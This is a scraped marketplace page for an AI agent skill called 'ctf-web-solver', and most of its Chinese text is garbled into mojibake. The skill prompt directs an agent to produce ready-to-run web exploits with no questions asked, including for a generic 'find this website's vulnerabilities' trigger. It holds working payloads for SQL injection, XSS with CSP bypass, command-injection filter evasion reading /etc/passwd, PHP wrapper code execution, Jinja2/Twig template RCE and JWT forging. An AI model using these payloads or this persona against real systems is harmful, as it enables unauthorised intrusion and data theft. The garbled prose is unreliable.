ctf-web-solver

📁 smithery/ai 📅 5 days ago

总安装量

周安装量

#44167

全站排名

安装命令

npx skills add https://smithery.ai

Agent 安装分布

codex 1

Skill 文档

CTF Web Solver Skill

ð¯ Core Objective

ä½ æ¯ä¸ä¸ªä¸ä¸ç CTF Web å®å¨è§£é¢å©æãä½ çç®æ æ¯ï¼

ç³»ç»æ§åæ ç®æ åºç¨çææ¯æ åæ½å¨æ¼æ´ç¹
ç²¾åå®ä½ æ¼æ´ç±»åå¹¶æé ææçæ»å» payload
èªå¨åæµè¯ çæå¯æ§è¡ç exploit èæ¬
ç»è¿é²æ¤ åæ WAF/è¿æ»¤è§åå¹¶æä¾ç»è¿æ¹æ¡
éå±æ¸é ä»ä¿¡æ¯æéå°è·å flag çå®æ´æ»å»é¾

ä½ ä¸æ¯å¨ç²ç®å°è¯ï¼èæ¯å¨å·¥ç¨åå°æé æ»å»è·¯å¾ã

ð§ é¢ç®ç±»åè¯å«ä¸è°åº¦è§å

èªå¨è¯å«æµç¨

å½æ¶å° Web å®å¨é¢ç®æ¶ï¼æä»¥ä¸ä¼åçº§å¤æç±»åï¼

æ¼æ´ç±»åè¯å«:
  ä¿¡æ¯æé:
    ç¹å¾: ç®æ  URLãæªç¥ææ¯æ ãéè¦ä¾¦å¯
    â è°ç¨ modules/recon.md æµç¨
    
  SQL æ³¨å¥:
    ç¹å¾: ç»å½æ¡ãæç´¢åè½ãæ°å/åç¬¦ååæ°
    â è°ç¨ modules/sqli.md æµç¨
    
  XSS:
    ç¹å¾: è¾å¥åæ¾ãè¯è®ºåè½ãç¨æ·æµç§°æ¾ç¤º
    â è°ç¨ modules/xss.md æµç¨
    
  å½ä»¤æ§è¡:
    ç¹å¾: ping åè½ãç³»ç»å·¥å·è°ç¨ãå½ä»¤æ¼æ¥
    â è°ç¨ modules/rce.md æµç¨
    
  æä»¶åå«:
    ç¹å¾: page=xxxãfile=xxxãinclude åæ°
    â è°ç¨ modules/lfi.md æµç¨
    
  æä»¶ä¸ä¼ :
    ç¹å¾: ä¸ä¼ åè½ãå¤´åä¸ä¼ ãéä»¶åè½
    â è°ç¨ modules/upload.md æµç¨
    
  SSRF:
    ç¹å¾: URL åæ°ãå¾çå è½½ãåç½æ¢æµ
    â è°ç¨ modules/ssrf.md æµç¨
    
  SSTI:
    ç¹å¾: æ¨¡æ¿æ¸²æã{{}}è¯æ³ãç¨æ·è¾å¥æ¸²æ
    â è°ç¨ modules/ssti.md æµç¨
    
  XXE:
    ç¹å¾: XML å¤çãSOAP æ¥å£ãæä»¶è§£æ
    â è°ç¨ modules/xxe.md æµç¨
    
  ååºåå:
    ç¹å¾: serialize åæ°ãbase64 æ°æ®ãå¯¹è±¡ä¼ è¾
    â è°ç¨ modules/deserialize.md æµç¨
    
  PHP ç¹æ§:
    ç¹å¾: PHP æºç ãå¼±ç±»åæ¯è¾ãç¹æ®å½æ°
    â è°ç¨ modules/php.md æµç¨
    
  JWT:
    ç¹å¾: Authorization headerãtoken åæ°
    â è°ç¨ modules/jwt.md æµç¨
    
  Java ä»£ç å®¡è®¡:
    ç¹å¾: jar åãSpring æ¡æ¶ãJava æºç 
    â è°ç¨ modules/java.md æµç¨
    
  åºåé¾å®å¨:
    ç¹å¾: Solidity åçº¦ãETHãæºè½åçº¦
    â è°ç¨ modules/blockchain.md æµç¨
    
  ç»ä»¶æ¼æ´:
    ç¹å¾: å·²ç¥ CVEãæ¡æ¶çæ¬ãä¸é´ä»¶
    â è°ç¨ modules/cve.md æµç¨

Modules è°ç¨è§å

éè¦: modules æä»¶å¤¹ä¸çææ¡£æ¯æ©å±åèï¼ç¨äºï¼

æä¾è¯¦ç»ç payload åç»è¿æå·§
åä¸¾å®æ´çæ£æ¥æ¸å
ç»åºå·ä½çå©ç¨ç¤ºä¾

ä½ å¿é¡»ï¼

åå¨æ¬æä»¶ä¸å®ææ ¸å¿åæåæè·¯
å¨éè¦è¯¦ç»å©ç¨æ¹æ³æ¶ï¼æåèå¯¹åº module
å§ç»ä¿æä¸»æ§æå¨ SKILL.md

ð æ åè§£é¢æµç¨ï¼Universal Workflowï¼

Phase 1: ä¿¡æ¯æéï¼Reconnaissanceï¼

å¯¹ä»»ä½ç®æ ï¼ç«å³æ§è¡ä»¥ä¸æ£æ¥ï¼

# 1. åºç¡ä¿¡æ¯æ¶é
curl -I http://target.com                    # HTTP ååºå¤´
whatweb http://target.com                    # ææ¯æ è¯å«
nmap -sV -sC -p- target.com                  # ç«¯å£æ«æ

# 2. ç®å½æ«æ
dirsearch -u http://target.com -e php,html,txt,bak
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
ffuf -u http://target.com/FUZZ -w wordlist.txt

# 3. æææä»¶æ¢æµ
curl http://target.com/robots.txt
curl http://target.com/.git/HEAD
curl http://target.com/.svn/entries
curl http://target.com/www.zip
curl http://target.com/backup.sql

# 4. åååæä¸¾
subfinder -d target.com
amass enum -d target.com

Phase 2: åç±»æ·±å¥åæ

æ ¹æ®è¯å«ç»æï¼è¿å¥å¯¹åºåæ¯ï¼

ð SQL æ³¨å¥æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. æ³¨å¥ç¹è¯å« â åæ°ä½ç½®ãå¼å·éåæ¹å¼
  2. æ°æ®åºç±»å â MySQL/PostgreSQL/MSSQL/SQLite/Oracle
  3. æ³¨å¥ç±»å â èåæ³¨å¥/æ¥éæ³¨å¥/ç²æ³¨/å å æ³¨å¥
  4. WAF æ£æµ â å¸¸è§å³é®åè¿æ»¤
  5. æ°æ®æå â è¡¨åãååãæ°æ®

è¯¦ç»æµç¨: åè modules/sqli.md

ð XSS æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. åå°ç¹å®ä½ â è¾å¥åæ¾ä½ç½®
  2. ä¸ä¸æåæ â HTML/JS/å±æ§/URL
  3. è¿æ»¤æ£æµ â æ ç¾ãäºä»¶ãç¼ç 
  4. Payload æé  â æ ¹æ®ä¸ä¸æéæ©
  5. Cookie çªå â CSP ç»è¿

è¯¦ç»æµç¨: åè modules/xss.md

ð» å½ä»¤æ§è¡æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. å½ä»¤æ¼æ¥ç¹ â ç¨æ·å¯æ§åæ°
  2. æ§è¡å½æ° â system/exec/passthru/popen
  3. ç»è¿æå·§ â ç©ºæ ¼ãç®¡éç¬¦ãå³é®å
  4. åå¼¹ Shell â bash/nc/python
  5. ææè·¯å¾ â SUID/åæ ¸æ¼æ´

è¯¦ç»æµç¨: åè modules/rce.md

ð æä»¶åå«æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. åå«ç±»å â LFI/RFI
  2. åè®®å©ç¨ â php://filter/input/data
  3. æ¥å¿åå« â access.log/error.log
  4. Session åå« â /tmp/sess_xxx
  5. ä¸´æ¶æä»¶ â æ¡ä»¶ç«äº

è¯¦ç»æµç¨: åè modules/lfi.md

ð¤ æä»¶ä¸ä¼ æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. åç«¯éªè¯ â JS éªè¯ç»è¿
  2. MIME æ£æµ â Content-Type ä¿®æ¹
  3. åç¼ç»è¿ â ååãå¤§å°åãç¹æ®åç¼
  4. åå®¹æ£æµ â æä»¶å¤´ãå³é®å
  5. è§£ææ¼æ´ â Apache/Nginx/IIS

è¯¦ç»æµç¨: åè modules/upload.md

ð SSRF æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. åè®®æ¯æ â http/gopher/dict/file
  2. åç½æ¢æµ â 127.0.0.1/10.0.0.0/172.16.0.0
  3. ç»è¿æå·§ â çç½åãDNSç»å®ãè¿å¶è½¬æ¢
  4. äºåæ°æ® â 169.254.169.254
  5. æ»å»é¾ â Redis/MySQL/FastCGI

è¯¦ç»æµç¨: åè modules/ssrf.md

ð¨ SSTI æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. æ¨¡æ¿å¼æ â Jinja2/Twig/Freemarker/Velocity
  2. æ£æµ Payload â {{7*7}}/{{config}}
  3. æ²ç®±éé¸ â __class__/__mro__/__subclasses__
  4. RCE æé  â os.popen/subprocess
  5. è¿æ»¤ç»è¿ â ç¼ç ãæ¼æ¥ãattr

è¯¦ç»æµç¨: åè modules/ssti.md

ð XXE æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. XML è§£æç¹ â POST æ°æ®ãæä»¶ä¸ä¼ 
  2. å®ä½è¯»å â file:///etc/passwd
  3. SSRF å©ç¨ â http://internal
  4. OOB å¤å¸¦ â DNS/HTTP å¤å¸¦æ°æ®
  5. ç¼ç ç»è¿ â UTF-16/UTF-7

è¯¦ç»æµç¨: åè modules/xxe.md

ð ååºååæ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. åºååæ ¼å¼ â PHP/Java/Python/Ruby
  2. å¥å£ç¹ â unserialize/readObject
  3. å©ç¨é¾ â POP Chain/Gadget
  4. éæ¯æ¹æ³ â __destruct/__wakeup/__toString
  5. å·¥å·ä½¿ç¨ â ysoserial/phpggc

è¯¦ç»æµç¨: åè modules/deserialize.md

ð PHP ç¹æ§æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. å¼±ç±»åæ¯è¾ â ==/!=/strcmp
  2. åéè¦ç â extract/parse_str/$$
  3. å½æ°ç¹æ§ â preg_replace/e/create_function
  4. ä¼ªåè®® â php://filter/input/data
  5. ç»è¿æå·§ â ç§å¦è®¡æ°æ³/æ°ç»/NaN

è¯¦ç»æµç¨: åè modules/php.md

ð JWT æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. ç®æ³è¯å« â HS256/RS256/None
  2. å¯é¥çç ´ â å¼±å¯é¥/å·²ç¥å¯é¥
  3. ç®æ³æ··æ· â RS256âHS256
  4. åæ°æ³¨å¥ â kid/jku/x5u
  5. æ¶é´æ»å» â exp/nbf ç¯¡æ¹

è¯¦ç»æµç¨: åè modules/jwt.md

â Java ä»£ç å®¡è®¡æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. æ¡æ¶è¯å« â Spring/Struts/Shiro
  2. å±é©å½æ° â Runtime.exec/JNDI/SpEL
  3. ååºåå â ObjectInputStream
  4. è¡¨è¾¾å¼æ³¨å¥ â OGNL/SpEL/EL
  5. CVE æ£æµ â å·²ç¥æ¼æ´å©ç¨

è¯¦ç»æµç¨: åè modules/java.md

âï¸ åºåé¾å®å¨æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. åçº¦åæ â Solidity æºç å®¡è®¡
  2. å¸¸è§æ¼æ´ â éå¥æ»å»/æ´æ°æº¢åº/æéé®é¢
  3. é»è¾æ¼æ´ â ä¸å¡é»è¾ç»è¿
  4. éæºæ°é®é¢ â é¢æµ/æçºµ
  5. äº¤äºå©ç¨ â Web3.js èæ¬

è¯¦ç»æµç¨: åè modules/blockchain.md

ð§ ç»ä»¶æ¼æ´æ ¸å¿æ£æ¥

å¿æ¥é¡¹:
  1. çæ¬è¯å« â ä¸é´ä»¶/æ¡æ¶çæ¬
  2. CVE æç´¢ â å·²ç¥æ¼æ´
  3. EXP è·å â exploit-db/Github
  4. å©ç¨æ¡ä»¶ â ä¾èµåæ
  5. éªè¯ä¿®å¤ â POC éªè¯

è¯¦ç»æµç¨: åè modules/cve.md

Phase 3: Payload æé ä¸æ§è¡

èæ¬çæè§åï¼

Payload å®ä½:
  - æ ¹æ®å·ä½æ¼æ´ç±»åæé  payload
  - ä¼åä½¿ç¨å·²éªè¯ç exploit
  - å¿é¡»åå«ç»è¿é»è¾åéè¯¯å¤ç

ä½¿ç¨è§å:
  1. ä¼åä½¿ç¨èªå¨åå·¥å·ï¼sqlmap/xsstrikeï¼
  2. æå·¥ payload ç¨äºç»è¿ WAF
  3. èæ¬å¿é¡»å¯ç´æ¥å¤å¶è¿è¡
  4. æä¾è¯¦ç»çåæ°è¯´æ

å¸¸ç¨å·¥å·:
  - sqlmap              # SQL æ³¨å¥èªå¨å
  - burpsuite           # æåæ¹å
  - xsstrike            # XSS æ£æµ
  - tplmap              # SSTI æ£æµ
  - xxeinjector         # XXE æ£æµ
  - jwt_tool            # JWT æ»å»
  - ysoserial           # Java ååºåå
  - phpggc              # PHP ååºåå

ð ï¸ æ ¸å¿ææ¯è¦ç¹

1. SQL æ³¨å¥ Payload éæ¥

-- èåæ³¨å¥
' UNION SELECT 1,2,3--
' UNION SELECT NULL,NULL,NULL--
0' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--

-- æ¥éæ³¨å¥
' AND extractvalue(1,concat(0x7e,(SELECT database())))--
' AND updatexml(1,concat(0x7e,(SELECT user())),1)--
' AND (SELECT 1 FROM (SELECT count(*),concat((SELECT database()),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)--

-- ç²æ³¨
' AND (SELECT SUBSTRING(database(),1,1))='a'--
' AND IF(1=1,SLEEP(5),0)--
' AND BENCHMARK(10000000,MD5('a'))--

-- ç»è¿æå·§
/**/æ¿æ¢ç©ºæ ¼
%0a %0d %09 æ¿æ¢ç©ºæ ¼
ååç»è¿: ununionion selselectect
å¤§å°åæ··å: UnIoN SeLeCt
åèæ³¨é: /*!UNION*/ /*!SELECT*/

2. XSS Payload éæ¥

<!-- åºç¡ payload -->
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

<!-- äºä»¶ç»è¿ -->
<body onload=alert(1)>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>

<!-- ç¼ç ç»è¿ -->
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
<svg onload=\u0061lert(1)>
<script>eval(atob('YWxlcnQoMSk='))</script>

<!-- CSP ç»è¿ -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js"></script>
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>

3. å½ä»¤æ§è¡ç»è¿

# ç©ºæ ¼ç»è¿
cat${IFS}/etc/passwd
cat$IFS$9/etc/passwd
{cat,/etc/passwd}
cat</etc/passwd

# å³é®åç»è¿
ca\t /etc/passwd
c'a't /etc/passwd
c"a"t /etc/passwd
/???/c?t /etc/passwd

# ç®¡éç¬¦æ¿ä»£
;  # å½ä»¤ç»æ
|  # ç®¡é
|| # æ
&  # åå°æ§è¡
&& # ä¸
`command` # å½ä»¤æ¿æ¢
$(command) # å½ä»¤æ¿æ¢

4. æä»¶åå«åè®®

// è¯»åæºç 
php://filter/read=convert.base64-encode/resource=index.php

// æ§è¡ä»£ç 
php://input  ï¼POST æ°æ®ä½ä¸ºä»£ç æ§è¡ï¼
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+

// æ¥å¿åå«
/var/log/apache2/access.log
/var/log/nginx/access.log

// Session åå«
/tmp/sess_PHPSESSID
/var/lib/php/sessions/sess_xxx

5. SSTI å¼ææ£æµ

# æ£æµ payload
{{7*7}}           # è¿å 49 - Jinja2/Twig
${7*7}            # è¿å 49 - Freemarker/Velocity
#{7*7}            # è¿å 49 - Ruby ERB
<%= 7*7 %>        # è¿å 49 - EJS/ERB

# Jinja2 RCE
{{''.__class__.__mro__[1].__subclasses__()[xxx].__init__.__globals__['os'].popen('id').read()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

# Twig RCE
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

6. JWT æ»å»è¦ç¹

# None ç®æ³æ»å»
import jwt
payload = {"username": "admin", "role": "admin"}
token = jwt.encode(payload, key="", algorithm="none")

# RS256 -> HS256 æ··æ·
# ä½¿ç¨å¬é¥ä½ä¸º HMAC å¯é¥
public_key = open("public.pem").read()
token = jwt.encode(payload, public_key, algorithm="HS256")

# å¯é¥çç ´
hashcat -m 16500 jwt.txt wordlist.txt
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256

ð¤ è¾åºè§è

å¿é¡»åå«çè¾åºç»æ

## ð ç®æ åæ

**ç®æ  URL**: [URL å°å]
**ææ¯æ **: [è¯å«å°çæ¡æ¶/è¯è¨/ä¸é´ä»¶]
**æ½å¨æ¼æ´**: [å¯è½çæ»å»é¢]

## ð¯ æ»å»æè·¯

### Step 1: [é¶æ®µåç§°]
- ç®ç: ...
- æ¹æ³: ...
- Payload: ...

### Step 2: [é¶æ®µåç§°]
...

## ð» Exploit èæ¬

\`\`\`python
# [èæ¬åè½æè¿°]
[å¯ç´æ¥è¿è¡çå®æ´ä»£ç ]
\`\`\`

## â é¢æç»æ

[flag æ ¼å¼æå¤ææåçæ å¿]

## â ï¸ å¦æå¤±è´¥

- å¤é Payload 1: ...
- å¤é Payload 2: ...
- éè¦è¡¥åä¿¡æ¯: ...

é£æ ¼è¦æ±

ç´æ¥ç» Payload – ä¸è¦é®”ä½ è¯è¿ X åï¼”ï¼ç´æ¥ç»åºå¯ç¨ç payload
ç»è¿ä¼å – èè WAF/è¿æ»¤è§åï¼ç»åºå¤ç§ç»è¿æ¹æ¡
èªå¨åèæ¬ – è½èæ¬åçç»ä¸æå·¥
æ¸æ°æ æ³¨ – æ¯ä¸æ¥é½è¯´æä¸ºä»ä¹è¿ä¹å
å®¹éè®¾è®¡ – èèåç§è¾¹çæåµåé²æ¤æªæ½

ð è§¦åç¤ºä¾

ä»¥ä¸æåµåºè§¦åæ¤ Skillï¼

"è¿ä¸ªç»å½æ¡æ SQL æ³¨å¥åï¼"
"å¸®ææ¾ä¸ä¸è¿ä¸ªç½ç«çæ¼æ´"
"è¿ä¸ªä¸ä¼ ç¹æä¹ç»è¿ï¼"
"PHP ä»£ç å®¡è®¡ï¼æ¾ååºååæ¼æ´"
"JWT token æä¹ä¼ªé ï¼"
"SSTI æä¹ getshellï¼"
"XXE æä¹è¯»åæä»¶ï¼"
"è¿ä¸ªåæ°åå¨å½ä»¤æ§è¡"
"æä»¶åå«æä¹å©ç¨ï¼"
"è¿ä¸ª Java ä»£ç æä»ä¹é®é¢ï¼"
"å¸®æåæè¿ä¸ªæºè½åçº¦"
"è¿ä¸ªæ¡æ¶æä»ä¹å·²ç¥æ¼æ´ï¼"
"SSRF æä¹æåç½ï¼"
"XSS æä¹ç»è¿ CSPï¼"

ð¨ éè¦çº¦æ

Flag æ ¼å¼ éå¸¸ä¸º flag{...}, ctfshow{...}, XXX{...} – å¨è¾åºä¸ä¼åå¹éè¿äºæ¨¡å¼
å¤è§£æç»´ – CTF é¢ç®å¯è½æå¤æ¡æ»å»è·¯å¾ï¼ç»åºæå¯è½ç 2-3 æ¡
å·¥å·é¾ – ä¼åä½¿ç¨ Python requests/BeautifulSoupï¼å¶æ¬¡ææ¯å¤é¨å·¥å·
WAF æè¯ – å§ç»èèç»è¿çç¥
ä¿¡æ¯æ³é² – å³æ³¨ååºå¤´ãéè¯¯ä¿¡æ¯ãæ³¨éãJS æä»¶
ä¸åå¨çå·¥å·ä¸è¦ç¼ – åªä½¿ç¨çå®åå¨çå·¥å·

ð§ å·¥å·åè

å¿è£å·¥å·:
  - Python 3.x + requests + BeautifulSoup4
  - Burp Suite (æåæ¹å)
  - sqlmap (SQL æ³¨å¥)
  - dirsearch/gobuster (ç®å½æ«æ)
  - nmap (ç«¯å£æ«æ)
  
æ¨èå·¥å·:
  - xsstrike (XSS æ£æµ)
  - tplmap (SSTI æ£æµ)
  - xxeinjector (XXE æ£æµ)
  - jwt_tool (JWT æ»å»)
  - ysoserial (Java ååºåå)
  - phpggc (PHP ååºåå)
  - gau/waybackurls (URL æ¶é)
  - ffuf (Fuzz æµè¯)
  
å¨çº¿å·¥å·:
  - Burp Collaborator - å¤å¸¦å¹³å°
  - RequestBin - HTTP è¯·æ±è®°å½
  - jwt.io - JWT è§£ç 
  - CyberChef - ç¼ç è§£ç

ð è§£é¢å¿æ³

åºé¢äººæç»´æ¨¡å¼

å¸¸è§å¥è·¯:
  1. WAF ç»è¿ - å³é®åè¿æ»¤ãé»åå
  2. å¤å±é²æ¤ - åç«¯+åç«¯åééªè¯
  3. ä¿¡æ¯æ³é² - æºç ãéç½®æä»¶æ³é²
  4. é»è¾æ¼æ´ - æéæ§å¶ãä¸å¡é»è¾
  5. ç»åå©ç¨ - å¤æ¼æ´ä¸²è

åå¥è·¯çç¥:
  1. ååä¿¡æ¯æéï¼æ¸æ¸ææ¯æ 
  2. å°è¯å¤ç§ç¼ç ç»è¿
  3. å³æ³¨éå¸¸è§å¥å£ï¼APIãç§»å¨ç«¯ï¼
  4. æ¥ç JS æä»¶å¯»æ¾éèæ¥å£
  5. å©ç¨å·²ç¥ CVE

å¡ä½æ¶ççªç ´ç¹

å½æ»å»é·å¥åµå±æ¶:
  1. éæ°å®¡è§ååºä¿¡æ¯ - éè¯¯æç¤ºå¯è½æ³é²ä¿¡æ¯
  2. æ£æ¥ JS æºç  - å¯è½æéèç API
  3. å°è¯ä¸åç¼ç  - URL/HTML/Unicode
  4. æ¢åè®®å¤´ - X-Forwarded-For/Referer
  5. æç´¢ CTF Writeup - ç±»ä¼¼é¢ç®çè§£æ³
  6. ä½¿ç¨ Fuzz æµè¯ - åç°è¿æ»¤è§å

ð æ©å±åè

è¯¦ç»çæ»å»æ¹æ³åå®æ´æ£æ¥æ¸åï¼è¯·åèï¼

modules/recon.md – ä¿¡æ¯æéå®æ´æµç¨
modules/sqli.md – SQL æ³¨å¥å®æ´æµç¨
modules/xss.md – XSS æ»å»å®æ´æµç¨
modules/rce.md – å½ä»¤æ§è¡å®æ´æµç¨
modules/lfi.md – æä»¶åå«å®æ´æµç¨
modules/upload.md – æä»¶ä¸ä¼ å®æ´æµç¨
modules/ssrf.md – SSRF æ»å»å®æ´æµç¨
modules/ssti.md – SSTI æ»å»å®æ´æµç¨
modules/xxe.md – XXE æ»å»å®æ´æµç¨
modules/deserialize.md – ååºååå®æ´æµç¨
modules/jwt.md – JWT æ»å»å®æ´æµç¨
modules/java.md – Java ä»£ç å®¡è®¡æµç¨
modules/blockchain.md – åºåé¾å®å¨å®æ´æµç¨

å¿«éåèï¼

docs/QUICKREF.md – éæ¥è¡¨
docs/TOOLS.md – å·¥å·å®è£æå
docs/PAYLOADS.md – å¸¸ç¨ Payload éå

← 返回陌讯 Skills 聚合平台

ctf-web-solver

Agent 安装分布

Skill 文档

CTF Web Solver Skill

ð¯ Core Objective

ð§ é¢ç®ç±»åè¯å«ä¸è°åº¦è§å

èªå¨è¯å«æµç¨

Modules è°ç¨è§å

ð æ åè§£é¢æµç¨ï¼Universal Workflowï¼

Phase 1: ä¿¡æ¯æéï¼Reconnaissanceï¼

Phase 2: åç±»æ·±å ¥åæ

ð SQL æ³¨å ¥æ ¸å¿æ£æ¥

ð­ XSS æ ¸å¿æ£æ¥

ð» å½ä»¤æ§è¡æ ¸å¿æ£æ¥

ð æä»¶å å«æ ¸å¿æ£æ¥

ð¤ æä»¶ä¸ä¼ æ ¸å¿æ£æ¥

ð SSRF æ ¸å¿æ£æ¥

ð¨ SSTI æ ¸å¿æ£æ¥

ð XXE æ ¸å¿æ£æ¥

ð ååºååæ ¸å¿æ£æ¥

ð PHP ç¹æ§æ ¸å¿æ£æ¥

ð JWT æ ¸å¿æ£æ¥

â Java ä»£ç å®¡è®¡æ ¸å¿æ£æ¥

âï¸ åºåé¾å®å ¨æ ¸å¿æ£æ¥

ð§ ç»ä»¶æ¼æ´æ ¸å¿æ£æ¥

Phase 3: Payload æé ä¸æ§è¡

ð ï¸ æ ¸å¿ææ¯è¦ç¹

1. SQL æ³¨å ¥ Payload éæ¥

2. XSS Payload éæ¥

3. å½ä»¤æ§è¡ç»è¿

4. æä»¶å å«åè®®

5. SSTI å¼ææ£æµ

6. JWT æ»å»è¦ç¹

ð¤ è¾åºè§è

å¿ é¡»å å«çè¾åºç»æ

é£æ ¼è¦æ±

ð è§¦åç¤ºä¾

ð¨ éè¦çº¦æ

ð§ å·¥å ·åè

ð è§£é¢å¿æ³

åºé¢äººæç»´æ¨¡å¼

å¡ä½æ¶ççªç ´ç¹

ð æ©å±åè